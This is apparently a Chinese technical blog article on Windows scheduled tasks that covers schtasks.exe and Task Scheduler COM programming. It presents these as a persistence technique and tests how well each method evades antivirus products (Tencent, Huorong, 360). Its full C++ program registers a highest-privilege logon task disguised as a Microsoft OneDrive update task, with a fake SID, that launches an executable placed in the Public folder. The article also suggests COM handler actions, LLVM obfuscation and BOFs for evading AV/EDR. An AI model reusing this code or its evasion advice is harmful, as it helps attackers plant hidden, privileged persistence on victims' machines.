Windows任务计划及其COM组件技术详解<\/h1>

一、前言<\/h2>
Windows系统下创建任务计划的主要方式有三种：<\/p>
任务计划的GUI界面<\/li>
任务计划的命令行工具schtasks.exe<\/li>
Windows提供的API接口<\/li> <\/ul>
本文将详细分析这三种方式，并重点介绍基于COM机制的任务计划API编程。掌握任务计划API编程不仅能够实现任务计划的自动化管理，还能深入理解Windows COM编程机制。<\/p>
二、任务计划GUI界面操作<\/h2>

基本操作步骤<\/h3>
在运行对话框中输入taskschd.msc<\/code>打开任务计划程序<\/li>
点击右侧的"创建任务"选项<\/li>
通过图形界面配置任务参数<\/li>
<\/ol>
这种方式适合手动操作，但不利于自动化部署。<\/p>
三、任务计划命令行工具schtasks.exe<\/h2>
基本创建命令<\/h3>
schtasks.exe \/create \/sc daily \/tn "Test Schedule"<\/span> \/tr "c:\windows\system32\notepad32.exe"<\/span>
<\/span><\/span><\/code><\/pre>参数说明<\/h3>

\/create<\/code>：创建新任务<\/li>
\/sc<\/code>：指定任务频率（daily、once、weekly、onlogon等）<\/li>
\/tn<\/code>：任务名称<\/li>
\/tr<\/code>：任务执行的程序路径<\/li>
<\/ul>
指定开始时间<\/h3>
schtasks.exe \/create \/sc daily \/st 15:00 \/tn "Test Schedule"<\/span> \/tr "c:\windows\system32\notepad32.exe"<\/span>
<\/span><\/span><\/code><\/pre>远程主机创建任务<\/h3>
schtasks \/s <hostname> \/u <username> \/p <password> \/create \/sc DAILY \/tn "Test Schedule"<\/span> \/tr "c:\windows\system32\notepad.exe"<\/span>
<\/span><\/span><\/code><\/pre>使用XML配置文件创建<\/h3>
schtasks \/create \/xml "Test Schedule.xml"<\/span> \/tn "Test Schedule"<\/span>
<\/span><\/span><\/code><\/pre>任务计划成功创建后，系统会在c:\windows\system32\tasks\<\/code>目录下生成对应的XML配置文件。<\/p>
四、schtasks.exe免杀效果测试<\/h2>
测试环境及结果<\/h3>


Windows 7 + 腾讯电脑管家<\/strong><\/p>

schtasks命令创建：成功<\/li>
schtasks配置文件创建：成功<\/li>
<\/ul>
<\/li>

Windows 2008 R2 + 火绒<\/strong><\/p>

schtasks命令创建：成功<\/li>
schtasks配置文件创建：成功<\/li>
<\/ul>
<\/li>

Windows 2012 + 360卫士 + 360杀毒<\/strong><\/p>

schtasks命令创建：失败<\/li>
schtasks配置文件创建：失败<\/li>
<\/ul>
<\/li>
<\/ol>
五、Windows API接口编程<\/h2>
COM（组件对象模型）基础<\/h3>
基本概念<\/h4>
COM是微软提出的二进制组件规范，允许不同语言、不同进程、甚至不同计算机之间的对象交互。其核心特点包括：<\/p>

二进制接口标准<\/strong>：通过统一的vtable结构实现跨语言调用<\/li>
接口隔离<\/strong>：不暴露类实现，仅通过接口访问<\/li>
全局唯一标识<\/strong>：每个COM类都有CLSID标识<\/li>
<\/ol>
IUnknown接口<\/h4>
所有COM对象都必须实现的基础接口：<\/p>
struct<\/span> IUnknown<\/span> {
<\/span><\/span>    virtual<\/span> HRESULT QueryInterface<\/span>(REFIID riid, void<\/span>**<\/span> ppvObject) =<\/span> 0<\/span>;
<\/span><\/span>    virtual<\/span> ULONG AddRef<\/span>() =<\/span> 0<\/span>;
<\/span><\/span>    virtual<\/span> ULONG Release<\/span>() =<\/span> 0<\/span>;
<\/span><\/span>};
<\/span><\/span><\/code><\/pre>COM对象创建流程<\/h4>

系统根据CLSID查找注册表HKEY_CLASSES_ROOT\CLSID\{CLSID}<\/code><\/li>
加载对应的DLL或EXE文件<\/li>
创建对象并返回接口指针<\/li>
<\/ol>
任务计划API编程实现<\/h3>
完整代码示例<\/h4>
#include<\/span> <windows.h><\/span>
<\/span><\/span><\/span>#include<\/span> <taskschd.h><\/span>
<\/span><\/span><\/span>#include<\/span> <comdef.h><\/span>
<\/span><\/span><\/span>#include<\/span> <stdio.h><\/span>
<\/span><\/span><\/span><\/span>
<\/span><\/span>#pragma comment(lib, "taskschd.lib")
<\/span><\/span><\/span>#pragma comment(lib, "comsuppw.lib")
<\/span><\/span><\/span><\/span>
<\/span><\/span>int<\/span> CreateScheduledTask<\/span>(LPCWSTR TaskAuthor, LPCWSTR TaskName, LPCWSTR wstrExePath) {
<\/span><\/span>    HRESULT hr =<\/span> S_OK;
<\/span><\/span>    
<\/span><\/span>    \/\/ 初始化COM库
<\/span><\/span><\/span><\/span>    hr =<\/span> ::<\/span>CoInitializeEx(NULL, COINIT_MULTITHREADED);
<\/span><\/span>    if<\/span> (FAILED(hr)) {
<\/span><\/span>        ::<\/span>wprintf(L<\/span>"[-] CoInitializeEx has failed<\/span>\n<\/span>"<\/span>);
<\/span><\/span>        return<\/span> 0<\/span>;
<\/span><\/span>    }
<\/span><\/span>    
<\/span><\/span>    \/\/ 设置COM安全级别
<\/span><\/span><\/span><\/span>    hr =<\/span> ::<\/span>CoInitializeSecurity(
<\/span><\/span>        NULL, -<\/span>1<\/span>, NULL, NULL,
<\/span><\/span>        RPC_C_AUTHN_LEVEL_PKT_PRIVACY,
<\/span><\/span>        RPC_C_IMP_LEVEL_IMPERSONATE,
<\/span><\/span>        NULL, 0<\/span>, NULL);
<\/span><\/span>    
<\/span><\/span>    \/\/ 创建任务服务实例
<\/span><\/span><\/span><\/span>    ITaskService*<\/span> pService =<\/span> NULL;
<\/span><\/span>    hr =<\/span> ::<\/span>CoCreateInstance(
<\/span><\/span>        CLSID_TaskScheduler,
<\/span><\/span>        NULL,
<\/span><\/span>        CLSCTX_INPROC_SERVER,
<\/span><\/span>        IID_ITaskService,
<\/span><\/span>        (void<\/span>**<\/span>)&<\/span>pService);
<\/span><\/span>    
<\/span><\/span>    if<\/span> (FAILED(hr)) {
<\/span><\/span>        ::<\/span>wprintf(L<\/span>"[-] CoCreateInstance has failed<\/span>\n<\/span>"<\/span>);
<\/span><\/span>        ::<\/span>CoUninitialize();
<\/span><\/span>        return<\/span> 0<\/span>;
<\/span><\/span>    }
<\/span><\/span>    
<\/span><\/span>    \/\/ 连接到本地任务计划服务
<\/span><\/span><\/span><\/span>    hr =<\/span> pService-><\/span>Connect(_variant_t(), _variant_t(), _variant_t(), _variant_t());
<\/span><\/span>    if<\/span> (FAILED(hr)) {
<\/span><\/span>        ::<\/span>wprintf(L<\/span>"[-] ITaskService Connect has failed<\/span>\n<\/span>"<\/span>);
<\/span><\/span>        pService-><\/span>Release();
<\/span><\/span>        ::<\/span>CoUninitialize();
<\/span><\/span>        return<\/span> 0<\/span>;
<\/span><\/span>    }
<\/span><\/span>    
<\/span><\/span>    \/\/ 获取任务计划根目录
<\/span><\/span><\/span><\/span>    ITaskFolder*<\/span> pRootFolder =<\/span> NULL;
<\/span><\/span>    hr =<\/span> pService-><\/span>GetFolder(_bstr_t(L<\/span>"<\/span>\\<\/span>"<\/span>), &<\/span>pRootFolder);
<\/span><\/span>    if<\/span> (FAILED(hr)) {
<\/span><\/span>        ::<\/span>wprintf(L<\/span>"[-] GetFolder has failed<\/span>\n<\/span>"<\/span>);
<\/span><\/span>        pService-><\/span>Release();
<\/span><\/span>        ::<\/span>CoUninitialize();
<\/span><\/span>        return<\/span> 0<\/span>;
<\/span><\/span>    }
<\/span><\/span>    
<\/span><\/span>    \/\/ 创建任务定义对象
<\/span><\/span><\/span><\/span>    ITaskDefinition*<\/span> pTask =<\/span> NULL;
<\/span><\/span>    hr =<\/span> pService-><\/span>NewTask(0<\/span>, &<\/span>pTask);
<\/span><\/span>    pService-><\/span>Release();
<\/span><\/span>    
<\/span><\/span>    if<\/span> (FAILED(hr)) {
<\/span><\/span>        ::<\/span>wprintf(L<\/span>"[-] NewTask has failed<\/span>\n<\/span>"<\/span>);
<\/span><\/span>        pRootFolder-><\/span>Release();
<\/span><\/span>        ::<\/span>CoUninitialize();
<\/span><\/span>        return<\/span> 0<\/span>;
<\/span><\/span>    }
<\/span><\/span>    
<\/span><\/span>    \/\/ 设置任务注册信息
<\/span><\/span><\/span><\/span>    IRegistrationInfo*<\/span> pRegInfo =<\/span> NULL;
<\/span><\/span>    hr =<\/span> pTask-><\/span>get_RegistrationInfo(&<\/span>pRegInfo);
<\/span><\/span>    if<\/span> (SUCCEEDED(hr)) {
<\/span><\/span>        pRegInfo-><\/span>put_Author(_bstr_t(TaskAuthor));
<\/span><\/span>        pRegInfo-><\/span>Release();
<\/span><\/span>    }
<\/span><\/span>    
<\/span><\/span>    \/\/ 设置任务主体信息
<\/span><\/span><\/span><\/span>    IPrincipal*<\/span> pPrincipal =<\/span> NULL;
<\/span><\/span>    hr =<\/span> pTask-><\/span>get_Principal(&<\/span>pPrincipal);
<\/span><\/span>    if<\/span> (SUCCEEDED(hr)) {
<\/span><\/span>        pPrincipal-><\/span>put_LogonType(TASK_LOGON_INTERACTIVE_TOKEN);
<\/span><\/span>        pPrincipal-><\/span>put_RunLevel(TASK_RUNLEVEL_HIGHEST);
<\/span><\/span>        pPrincipal-><\/span>Release();
<\/span><\/span>    }
<\/span><\/span>    
<\/span><\/span>    \/\/ 设置任务触发器（登录触发）
<\/span><\/span><\/span><\/span>    ITriggerCollection*<\/span> pTriggerCollection =<\/span> NULL;
<\/span><\/span>    hr =<\/span> pTask-><\/span>get_Triggers(&<\/span>pTriggerCollection);
<\/span><\/span>    if<\/span> (FAILED(hr)) {
<\/span><\/span>        ::<\/span>wprintf(L<\/span>"[-] get_Triggers has failed<\/span>\n<\/span>"<\/span>);
<\/span><\/span>        pRootFolder-><\/span>Release();
<\/span><\/span>        pTask-><\/span>Release();
<\/span><\/span>        ::<\/span>CoUninitialize();
<\/span><\/span>        return<\/span> 0<\/span>;
<\/span><\/span>    }
<\/span><\/span>    
<\/span><\/span>    ITrigger*<\/span> pTrigger =<\/span> NULL;
<\/span><\/span>    hr =<\/span> pTriggerCollection-><\/span>Create(TASK_TRIGGER_LOGON, &<\/span>pTrigger);
<\/span><\/span>    pTriggerCollection-><\/span>Release();
<\/span><\/span>    
<\/span><\/span>    if<\/span> (FAILED(hr)) {
<\/span><\/span>        ::<\/span>wprintf(L<\/span>"[-] Create trigger has failed<\/span>\n<\/span>"<\/span>);
<\/span><\/span>        pRootFolder-><\/span>Release();
<\/span><\/span>        pTask-><\/span>Release();
<\/span><\/span>        ::<\/span>CoUninitialize();
<\/span><\/span>        return<\/span> 0<\/span>;
<\/span><\/span>    }
<\/span><\/span>    
<\/span><\/span>    \/\/ 配置登录触发器
<\/span><\/span><\/span><\/span>    ILogonTrigger*<\/span> pLogonTrigger =<\/span> NULL;
<\/span><\/span>    hr =<\/span> pTrigger-><\/span>QueryInterface(IID_ILogonTrigger, (void<\/span>**<\/span>)&<\/span>pLogonTrigger);
<\/span><\/span>    pTrigger-><\/span>Release();
<\/span><\/span>    
<\/span><\/span>    if<\/span> (FAILED(hr)) {
<\/span><\/span>        ::<\/span>wprintf(L<\/span>"[-] QueryInterface for ILogonTrigger has failed<\/span>\n<\/span>"<\/span>);
<\/span><\/span>        pRootFolder-><\/span>Release();
<\/span><\/span>        pTask-><\/span>Release();
<\/span><\/span>        ::<\/span>CoUninitialize();
<\/span><\/span>        return<\/span> 0<\/span>;
<\/span><\/span>    }
<\/span><\/span>    
<\/span><\/span>    \/\/ 设置触发器ID
<\/span><\/span><\/span><\/span>    hr =<\/span> pLogonTrigger-><\/span>put_Id(_bstr_t(L<\/span>"LogonTriggerId"<\/span>));
<\/span><\/span>    
<\/span><\/span>    \/\/ 设置触发用户（可选）
<\/span><\/span><\/span><\/span>    WCHAR username[256<\/span>];
<\/span><\/span>    DWORD usernameLen =<\/span> 256<\/span>;
<\/span><\/span>    if<\/span> (GetUserNameW(username, &<\/span>usernameLen)) {
<\/span><\/span>        hr =<\/span> pLogonTrigger-><\/span>put_UserId(_bstr_t(username));
<\/span><\/span>        if<\/span> (SUCCEEDED(hr)) {
<\/span><\/span>            ::<\/span>wprintf(L<\/span>"[+] Task will trigger on logon for user: %s<\/span>\n<\/span>"<\/span>, username);
<\/span><\/span>        }
<\/span><\/span>    }
<\/span><\/span>    pLogonTrigger-><\/span>Release();
<\/span><\/span>    
<\/span><\/span>    \/\/ 设置任务动作
<\/span><\/span><\/span><\/span>    IActionCollection*<\/span> pActionCollection =<\/span> NULL;
<\/span><\/span>    hr =<\/span> pTask-><\/span>get_Actions(&<\/span>pActionCollection);
<\/span><\/span>    if<\/span> (FAILED(hr)) {
<\/span><\/span>        ::<\/span>wprintf(L<\/span>"[-] get_Actions has failed<\/span>\n<\/span>"<\/span>);
<\/span><\/span>        pRootFolder-><\/span>Release();
<\/span><\/span>        pTask-><\/span>Release();
<\/span><\/span>        ::<\/span>CoUninitialize();
<\/span><\/span>        return<\/span> 0<\/span>;
<\/span><\/span>    }
<\/span><\/span>    
<\/span><\/span>    IAction*<\/span> pAction =<\/span> NULL;
<\/span><\/span>    hr =<\/span> pActionCollection-><\/span>Create(TASK_ACTION_EXEC, &<\/span>pAction);
<\/span><\/span>    pActionCollection-><\/span>Release();
<\/span><\/span>    
<\/span><\/span>    if<\/span> (FAILED(hr)) {
<\/span><\/span>        ::<\/span>wprintf(L<\/span>"[-] Create action has failed<\/span>\n<\/span>"<\/span>);
<\/span><\/span>        pRootFolder-><\/span>Release();
<\/span><\/span>        pTask-><\/span>Release();
<\/span><\/span>        ::<\/span>CoUninitialize();
<\/span><\/span>        return<\/span> 0<\/span>;
<\/span><\/span>    }
<\/span><\/span>    
<\/span><\/span>    \/\/ 配置执行动作
<\/span><\/span><\/span><\/span>    IExecAction*<\/span> pExecAction =<\/span> NULL;
<\/span><\/span>    hr =<\/span> pAction-><\/span>QueryInterface(IID_IExecAction, (void<\/span>**<\/span>)&<\/span>pExecAction);
<\/span><\/span>    pAction-><\/span>Release();
<\/span><\/span>    
<\/span><\/span>    if<\/span> (FAILED(hr)) {
<\/span><\/span>        ::<\/span>wprintf(L<\/span>"[-] QueryInterface action has failed<\/span>\n<\/span>"<\/span>);
<\/span><\/span>        pRootFolder-><\/span>Release();
<\/span><\/span>        pTask-><\/span>Release();
<\/span><\/span>        ::<\/span>CoUninitialize();
<\/span><\/span>        return<\/span> 0<\/span>;
<\/span><\/span>    }
<\/span><\/span>    
<\/span><\/span>    hr =<\/span> pExecAction-><\/span>put_Path(_bstr_t(wstrExePath));
<\/span><\/span>    pExecAction-><\/span>Release();
<\/span><\/span>    
<\/span><\/span>    \/\/ 注册任务
<\/span><\/span><\/span><\/span>    IRegisteredTask*<\/span> pRegisteredTask =<\/span> NULL;
<\/span><\/span>    hr =<\/span> pRootFolder-><\/span>RegisterTaskDefinition(
<\/span><\/span>        _bstr_t(TaskName),
<\/span><\/span>        pTask,
<\/span><\/span>        TASK_CREATE_OR_UPDATE,
<\/span><\/span>        _variant_t(),
<\/span><\/span>        _variant_t(),
<\/span><\/span>        TASK_LOGON_INTERACTIVE_TOKEN,
<\/span><\/span>        _variant_t(L<\/span>""<\/span>),
<\/span><\/span>        &<\/span>pRegisteredTask);
<\/span><\/span>    
<\/span><\/span>    if<\/span> (FAILED(hr)) {
<\/span><\/span>        ::<\/span>wprintf(L<\/span>"[-] RegisterTaskDefinition has failed, error: 0x%08X<\/span>\n<\/span>"<\/span>, hr);
<\/span><\/span>    } else<\/span> {
<\/span><\/span>        ::<\/span>wprintf(L<\/span>"[+] Scheduled task has been created<\/span>\n<\/span>"<\/span>);
<\/span><\/span>        
<\/span><\/span>        \/\/ 立即执行任务
<\/span><\/span><\/span><\/span>        IRunningTask*<\/span> pRunningTask =<\/span> NULL;
<\/span><\/span>        hr =<\/span> pRegisteredTask-><\/span>Run(_variant_t(), &<\/span>pRunningTask);
<\/span><\/span>        if<\/span> (SUCCEEDED(hr)) {
<\/span><\/span>            wprintf(L<\/span>"[+] Task has been executed immediately<\/span>\n<\/span>"<\/span>);
<\/span><\/span>            if<\/span> (pRunningTask) pRunningTask-><\/span>Release();
<\/span><\/span>        }
<\/span><\/span>    }
<\/span><\/span>    
<\/span><\/span>    \/\/ 释放资源
<\/span><\/span><\/span><\/span>    if<\/span> (pRootFolder) pRootFolder-><\/span>Release();
<\/span><\/span>    if<\/span> (pTask) pTask-><\/span>Release();
<\/span><\/span>    if<\/span> (pRegisteredTask) pRegisteredTask-><\/span>Release();
<\/span><\/span>    ::<\/span>CoUninitialize();
<\/span><\/span>    
<\/span><\/span>    return<\/span> 1<\/span>;
<\/span><\/span>}
<\/span><\/span>
<\/span><\/span>int<\/span> main<\/span>() {
<\/span><\/span>    WCHAR TaskAuthor[] =<\/span> L<\/span>"Microsoft Corporation"<\/span>;
<\/span><\/span>    WCHAR TaskName[] =<\/span> L<\/span>"OneDrive Standalone Update Task-S-1-5-21-4162225321-4122752593-2322023677-001"<\/span>;
<\/span><\/span>    WCHAR path[] =<\/span> L<\/span>"C:<\/span>\\<\/span>Users<\/span>\\<\/span>Public<\/span>\\<\/span>OneDrive.exe"<\/span>;
<\/span><\/span>    
<\/span><\/span>    DWORD res_sch =<\/span> CreateScheduledTask(TaskAuthor, TaskName, path);
<\/span><\/span>    return<\/span> 1<\/span>;
<\/span><\/span>}
<\/span><\/span><\/code><\/pre>关键编程步骤详解<\/h3>
1. COM库初始化<\/h4>
hr =<\/span> ::<\/span>CoInitializeEx(NULL, COINIT_MULTITHREADED);
<\/span><\/span>hr =<\/span> ::<\/span>CoInitializeSecurity(NULL, -<\/span>1<\/span>, NULL, NULL, RPC_C_AUTHN_LEVEL_PKT_PRIVACY, 
<\/span><\/span>                           RPC_C_IMP_LEVEL_IMPERSONATE, NULL, 0<\/span>, NULL);
<\/span><\/span><\/code><\/pre>2. 创建任务服务实例<\/h4>
hr =<\/span> ::<\/span>CoCreateInstance(CLSID_TaskScheduler, NULL, CLSCTX_INPROC_SERVER, 
<\/span><\/span>                       IID_ITaskService, (void<\/span>**<\/span>)&<\/span>pService);
<\/span><\/span><\/code><\/pre>3. 任务配置流程<\/h4>

注册信息设置<\/strong>：设置任务创建者信息<\/li>
主体信息配置<\/strong>：设置运行权限和登录类型<\/li>
触发器设置<\/strong>：支持多种触发类型（登录、定时等）<\/li>
动作配置<\/strong>：支持执行程序、发送邮件等动作类型<\/li>
<\/ul>
4. 替代动作类型<\/h4>
除了IExecAction<\/code>，还可以使用IComHandlerAction<\/code>作为AV\/EDR躲避的替代方案。<\/p>
免杀效果测试<\/h3>
测试环境<\/strong>：Windows 2012 + 360卫士 + 360杀毒<\/p>
结果分析<\/strong>：<\/p>

静态查杀：文件落地被检测<\/li>
行为检测：添加任务计划动作不被拦截<\/li>
解决方案：通过LLVM混淆、BOF等技术绕过静态检测<\/li>
<\/ul>
六、技术要点总结<\/h2>

COM编程核心<\/strong>：掌握IUnknown接口和QueryInterface机制<\/li>
任务计划API关键<\/strong>：理解任务定义、触发器、动作的配置流程<\/li>
免杀考虑<\/strong>：静态检测可通过代码混淆解决，行为检测需关注API调用方式<\/li>
扩展应用<\/strong>：COM机制可应用于其他Windows组件编程<\/li>
<\/ol>
通过深入理解任务计划COM组件的编程方式，可以灵活实现各种自动化任务管理需求，并为其他Windows COM组件编程打下坚实基础。<\/p>
Windows任务计划及其COM组件技术详解<\/h1>

二、任务计划GUI界面操作<\/h2>

三、任务计划命令行工具schtasks.exe<\/h2>

五、Windows API接口编程<\/h2>

COM（组件对象模型）基础<\/h3>

任务计划API编程实现<\/h3>

关键编程步骤详解<\/h3>

4. 替代动作类型<\/h4> 除了IExecAction<\/code>，还可以使用IComHandlerAction<\/code>作为AV\/EDR躲避的替代方案。<\/p>

4. 替代动作类型<\/h4>
除了`IExecAction<\/code>，还可以使用IComHandlerAction<\/code>作为AV\/EDR躲避的替代方案。<\/p>`
